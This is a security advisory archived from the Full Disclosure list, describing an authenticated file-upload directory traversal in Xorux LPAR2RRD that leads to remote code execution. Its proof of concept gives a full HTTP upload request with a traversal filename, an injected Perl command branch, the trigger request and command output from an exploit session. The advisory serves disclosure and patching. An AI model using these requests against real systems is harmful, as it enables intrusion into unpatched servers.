Full Disclosure mailing list archives
From: KoreLogic Disclosures via Fulldisclosure <fulldisclosure () seclists org>
Date: Mon, 28 Jul 2025 18:42:21 -0500
KL-001-2025-016: Xorux LPAR2RRD File Upload Directory Traversal Title: Xorux LPAR2RRD File Upload Directory Traversal Advisory ID: KL-001-2025-016 Publication Date: 2025-07-28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-016.txt 1. Vulnerability Details Affected Vendor: Xorux Affected Product: LPAR2RRD Affected Version: 8.04 and prior Platform: Rocky Linux 8.10 CWE Classification: CWE-24: Path Traversal: '../filedir', CWE-434: Unrestricted Upload of File with Dangerous Type, CWE-648: Incorrect Use of Privileged APIs CVE ID: CVE-2025-54769 2. Vulnerability Description An authenticated, read-only user can upload a file and perform a directory traversal to have the uploaded file placed in a location of their choosing. This can be used to overwrite existing PERL modules within the application to achieve remote code execution (RCE) by an attacker. 3. Technical Description The filename can be altered manually to direct on the local filesystem on the Xormon Original appliance the upgrade file should be placed. The Xormon appliance will recognize the file as not being a valid upgrade package, but still writes the file to the filesystem. This can be exploited to write a valid PERL script into the /home/lpar2rrd/lpar2rrd/bin/ directory, where it can be called by existing scripts that are accessible via https://<IP>/lpar2rrd-cgi/<script> URL. 4. Mitigation and Remediation Recommendation Xorux released version 8.05, which includes a remediation for this vulnerability. See https://lpar2rrd.com/note800.php. 5. Credit This vulnerability was discovered by Jim Becher of KoreLogic, Inc. 6. Disclosure Timeline 2025-07-17 : KoreLogic requests point-of-contact to securely report several vulnerabilities to Xorux. 2025-07-18 : Vendor provides support () xorux com as the point-of-contact, noting that they do not use PGP. 2025-07-21 : KoreLogic submits this vulnerability and four additional discoveries to Xorux. 2025-07-23 : Vendor acknowledges receipt, stating that the issue has been remediated and a new version of the affected product will be available 2025-07-25. 2025-07-25 : Xorux publishes updated version of the affected product. 2025-07-28 : KoreLogic public disclosure. 7. Proof of Concept A simple proof of concept is to alter the users.pl script and add some additional logic which will perform the id command. The POST is performed using a read-only user, authenticated via Basic Auth. POST /lpar2rrd-cgi/upgrade.sh HTTP/1.1 Host: 172.31.255.207 Cookie: browserTZ=America%2FChicago User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=----geckoformboundaryc85a7a0a8e67e32643575b13f47b175f Content-Length: 15057 Origin: https://172.31.255.207 Authorization: Basic amJlY2hlcjpqYmVjaGVy Referer: https://172.31.255.207/lpar2rrd/index.html?amenu=upgrade&tab=0 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers Connection: keep-alive ------geckoformboundaryc85a7a0a8e67e32643575b13f47b175f Content-Disposition: form-data; name="upgfile"; filename="../home/lpar2rrd/lpar2rrd/bin/users.pl" Content-Type: application/x-perl use strict; use warnings; use CGI::Carp qw(fatalsToBrowser); use Data::Dumper;lpar2rrd 934 1 0 Apr02 ? 01:24:22 /usr/bin/java -Xms512M -Xmx1024M -server -XX:+UseG1GC -Dh2.bindAddress=127.0.0.1 -jar /opt/xorux/xormon/xormon.war... [SNIPPED for brevity] # Kore elsif ( $PAR{cmd} eq "kore" ) { my $out; print "Content-type: text/html\n\n"; $out = system("/usr/bin/id"); print $out; } ... [SNIPPED for brevity] The response from the Xormon Original appliance is: HTTP/1.1 200 OK Date: Thu, 03 Apr 2025 00:37:18 GMT Server: Apache X-Frame-Options: SAMEORIGIN Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json Content-Length: 93 { "success": false, "message" : "This file doesn't look like the upgrade package", "log": ""} But the file is still written to the filesystem. Subsequent calls to the https://<ip>/lpar2rrd-cgi/users.sh script with the cmd added return the output of the id command, as show below. GET /lpar2rrd-cgi/users.sh?cmd=kore HTTP/1.1 Host: 172.31.255.207 Cookie: browserTZ=America%2FChicago User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Authorization: Basic amJlY2hlcjpqYmVjaGVy Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i Pragma: no-cache Cache-Control: no-cache Te: trailers Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 03 Apr 2025 00:37:42 GMT Server: Apache X-Frame-Options: SAMEORIGIN Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 61 uid=1005(lpar2rrd) gid=1005(lpar2rrd) groups=1005(lpar2rrd) 0 This can be expanded upon to create a full-fledged exploit. attacker $ python3 xormon-orig-readonly-rce.py >id uid=1005(lpar2rrd) gid=1005(lpar2rrd) groups=1005(lpar2rrd) 0 >netstat -an | grep LIST | head -10 tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:8162 0.0.0.0:* LISTEN tcp6 0 0 :::111 :::* LISTEN tcp6 0 0 :::80 :::* LISTEN tcp6 0 0 :::22 :::* LISTEN tcp6 0 0 ::1:25 :::* LISTEN tcp6 0 0 :::8443 :::* LISTEN tcp6 0 0 127.0.0.1:39931 :::* LISTEN 0 >ps -efww | grep "java"
lpar2rrd 1730823 1730810 0 12:14 ? 00:00:00 sh -c ps -efww | grep "java" lpar2rrd 1730825 1730823 0 12:14 ? 00:00:00 grep java 0 >quit attacker $ The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
Attachment:
OpenPGP_signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- KL-001-2025-016: Xorux LPAR2RRD File Upload Directory Traversal KoreLogic Disclosures via Fulldisclosure (Jul 28)
Related Articles
Stay Informed
Get the best articles every day for FREE. Cancel anytime.